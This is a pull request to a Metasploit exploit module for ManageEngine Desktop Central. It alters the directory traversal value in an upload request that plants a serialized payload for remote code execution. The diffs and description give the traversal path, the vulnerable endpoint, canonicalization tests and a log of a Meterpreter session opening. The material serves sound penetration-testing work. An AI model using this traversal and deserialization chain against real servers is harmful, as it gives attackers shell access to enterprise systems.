### PR TITLE
Remove directory traversal prefix altogether in desktopcentral_deserialization

### DIFF
--- a/modules/exploits/windows/http/desktopcentral_deserialization.rb
+++ b/modules/exploits/windows/http/desktopcentral_deserialization.rb
@@ -167,15 +167,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def upload_serialized_payload(serialized_payload)
     print_status('Uploading serialized payload')
 
-    target_dir =
-      "#{rand_text_alpha(8..42)}\\..\\..\\..\\webapps\\DesktopCentral\\_chart"
-
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/mdm/client/v1/mdmLogUploader'),
       'ctype' => 'application/octet-stream',
       'vars_get' => {
-        'udid' => target_dir,
+        'udid' => '\\..\\..\\..\\webapps\\DesktopCentral\\_chart',
         'filename' => 'logger.zip'
       },
       'data' => serialized_payload

--- a/modules/exploits/windows/http/desktopcentral_deserialization.rb
+++ b/modules/exploits/windows/http/desktopcentral_deserialization.rb
@@ -172,7 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '/mdm/client/v1/mdmLogUploader'),
       'ctype' => 'application/octet-stream',
       'vars_get' => {
-        # C:\Program Files\DesktopCentral_Server\mdm-logs\foo\bar
+        # Traversal from C:\Program Files\DesktopCentral_Server\mdm-logs\foo\bar
         'udid' => '\\..\\..\\..\\webapps\\DesktopCentral\\_chart',
         'filename' => 'logger.zip'
       },
@@ -185,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_good('Successfully uploaded serialized payload')
 
-    # C:\Program Files\DesktopCentral_Server\bin
+    # Shell lands in C:\Program Files\DesktopCentral_Server\bin
     register_file_for_cleanup('..\\webapps\\DesktopCentral\\_chart\\logger.zip')
   end
 

--- a/modules/exploits/windows/http/desktopcentral_deserialization.rb
+++ b/modules/exploits/windows/http/desktopcentral_deserialization.rb
@@ -172,6 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '/mdm/client/v1/mdmLogUploader'),
       'ctype' => 'application/octet-stream',
       'vars_get' => {
+        # C:\Program Files\DesktopCentral_Server\mdm-logs\foo\bar
         'udid' => '\\..\\..\\..\\webapps\\DesktopCentral\\_chart',
         'filename' => 'logger.zip'
       },


### PR DESCRIPTION
Context: https://github.com/rapid7/metasploit-framework/pull/13348#discussion_r416171925.

> The path is necessary to reach the deserialization code in `getChartImage()`.
>
> I'm pretty sure `si` stands for Source Incite, @stevenseeley's company. `si` was probably an intentional IOC he added to his PoC. :-)
>
> That said, I don't think a prefix is necessary at all due to how the directory traversal is canonicalized. I'll be removing the prefix shortly if all goes well.
>
> I hesitate to go out of my way to remove IOCs from a Metasploit module because our code is public, but this identifier makes sense to randomize or drop entirely.

Code from Desktop Central:

```
String localDirToStore = baseDir + File.separator + "mdm-logs" + File.separator + customerID
        + File.separator + deviceName + "_" + udid;                                                             // 3
```

Canonicalization tests:

```
wvu@kharak:~$ realpath -m /mdm-logs/foo/barsi/../../../webapps/DesktopCentral/_chart
/webapps/DesktopCentral/_chart
wvu@kharak:~$ realpath -m /mdm-logs/foo/bar/../../../webapps/DesktopCentral/_chart
/webapps/DesktopCentral/_chart
wvu@kharak:~$
```

Verified working with changes:

```
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.150:50092) at 2020-04-27 20:31:59 -0500
```

Updates #13348.